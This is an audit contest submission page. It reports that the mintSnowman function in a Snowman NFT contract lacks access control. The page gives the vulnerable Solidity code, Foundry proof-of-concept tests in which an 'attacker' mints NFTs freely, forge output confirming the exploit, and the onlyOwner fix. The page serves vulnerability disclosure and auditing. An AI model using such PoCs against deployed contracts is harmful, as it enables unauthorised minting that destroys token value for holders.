Snowman Merkle Airdrop

AI First Flight #10

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Missing Access Control in Snowman.mintSnowman

redbud

Root + Impact

The mintSnowman function in the Snowman contract is declared as external, meaning it can be called by any external address. However, it lacks any access control modifiers (like OpenZeppelin's onlyOwner) or internal checks to verify that the caller is authorized.

Description

The protocol's integrity relies on the scarcity of Snowman NFTs, which are intended to be earned only by staking Snow tokens in the SnowmanAirdrop contract. By leaving mintSnowman open to the public, the contract allows any malicious actor to:

Bypass the staking and airdrop mechanism entirely.
Flood the market with an infinite supply of Snowman NFTs at no cost.
Destroy the economic value of existing NFTs and the utility of the Snow token.

Since the function allows specifying both the receiver and the amount, an attacker can mint millions of NFTs to themselves or multiple addresses in a single transaction, only limited by the block gas limit.

// src/Snowman.sol

@> function mintSnowman(address receiver, uint256 amount) external {

for (uint256 i = 0; i < amount; i++) {

_safeMint(receiver, s_TokenCounter);

emit SnowmanMinted(receiver, s_TokenCounter);

s_TokenCounter++;

}

Risk

Likelihood: High

The vulnerability is trivial to discover as it is a public function in a core contract.
No prerequisites (like owning tokens or holding specific roles) are needed to execute the attack.
Tools like Slither or static analyzers will immediately flag this as a critical missing permission.

Impact: High

Complete loss of NFT scarcity.
Total devaluation of the protocol's primary reward asset.
Breaking the intended logic where NFTs are tied to Snow token holdings.

Proof of Concept

The PoC demonstrates that an unauthorized attacker address, which holds no Snow tokens and has no special privileges, can call mintSnowman for any amount. The test checks the balanceOf the attacker before and after the call to confirm that the NFTs were successfully minted and assigned to them.

function test_poc_MissingAccessControl() public {

// 1. Setup the attacker address

address attacker = makeAddr("attacker");

// 2. The attacker calls mintSnowman directly (unauthorized)

vm.prank(attacker);

nft.mintSnowman(attacker, 10);

// 3. Verify that the attacker now owns 10 NFTs

assertEq(nft.balanceOf(attacker), 10);

console2.log("Attacker successfully minted 10 NFTs for free");

}

Recommended Mitigation

The Snowman contract already inherits from Ownable. The most direct fix is to add the onlyOwner modifier to the mintSnowman function. This ensures that only the deployer (or a designated admin) can mint NFTs. Alternatively, the SnowmanAirdrop contract should be granted a "Minter" role, or the mintSnowman function should verify that the msg.sender is the deployed Airdrop contract.

- function mintSnowman(address receiver, uint256 amount) external {

+ function mintSnowman(address receiver, uint256 amount) external onlyOwner {

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 24 hours ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-01] Unrestricted NFT Minting in Snowman.sol

# Root + Impact ## Description * The Snowman NFT contract is designed to mint NFTs through a controlled airdrop mechanism where only authorized entities should be able to create new tokens for eligible recipients. * The `mintSnowman()` function lacks any access control mechanisms, allowing any external address to call the function and mint unlimited NFTs to any recipient without authorization, completely bypassing the intended airdrop distribution model. ```Solidity // Root cause in the codebase function mintSnowman(address receiver, uint256 amount) external { @> // NO ACCESS CONTROL - Any address can call this function for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } @> // NO VALIDATION - No checks on amount or caller authorization } ``` ## Risk **Likelihood**: * The vulnerability will be exploited as soon as any malicious actor discovers the contract address, since the function is publicly accessible with no restrictions * Automated scanning tools and MEV bots continuously monitor new contract deployments for exploitable functions, making discovery inevitable **Impact**: * Complete destruction of tokenomics through unlimited supply inflation, rendering all legitimate NFTs worthless * Total compromise of the airdrop mechanism, allowing attackers to mint millions of tokens and undermine the project's credibility and economic model ## Proof of Concept ```Solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.24; import {Test, console2} from "forge-std/Test.sol"; import {Snowman} from "../src/Snowman.sol"; contract SnowmanExploitPoC is Test { Snowman public snowman; address public attacker = makeAddr("attacker"); string constant SVG_URI = "data:image/svg+xml;base64,PHN2Zy4uLi4+"; function setUp() public { snowman = new Snowman(SVG_URI); } function testExploit_UnrestrictedMinting() public { console2.log("=== UNRESTRICTED MINTING EXPLOIT ==="); console2.log("Initial token counter:", snowman.getTokenCounter()); console2.log("Attacker balance before:", snowman.balanceOf(attacker)); // EXPLOIT: Anyone can mint unlimited NFTs vm.prank(attacker); snowman.mintSnowman(attacker, 1000); // Mint 1K NFTs console2.log("Final token counter:", snowman.getTokenCounter()); console2.log("Attacker balance after:", snowman.balanceOf(attacker)); // Verify exploit success assertEq(snowman.balanceOf(attacker), 1000); assertEq(snowman.getTokenCounter(), 1000); console2.log(" EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization"); } } ``` <br /> PoC Results: ```Solidity forge test --match-test testExploit_UnrestrictedMinting -vv [⠑] Compiling... [⠢] Compiling 1 files with Solc 0.8.29 [⠰] Solc 0.8.29 finished in 1.45s Compiler run successful! Ran 1 test for test/SnowmanExploitPoC.t.sol:SnowmanExploitPoC [PASS] testExploit_UnrestrictedMinting() (gas: 26868041) Logs: === UNRESTRICTED MINTING EXPLOIT === Initial token counter: 0 Attacker balance before: 0 Final token counter: 1000 Attacker balance after: 1000 EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.28ms (3.58ms CPU time) Ran 1 test suite in 10.15ms (4.28ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests) ``` ## Recommended Mitigation Adding the `onlyOwner` modifier restricts the `mintSnowman()` function to only be callable by the contract owner, preventing unauthorized addresses from minting NFTs. ```diff - function mintSnowman(address receiver, uint256 amount) external { + function mintSnowman(address receiver, uint256 amount) external onlyOwner { for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } } ```

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!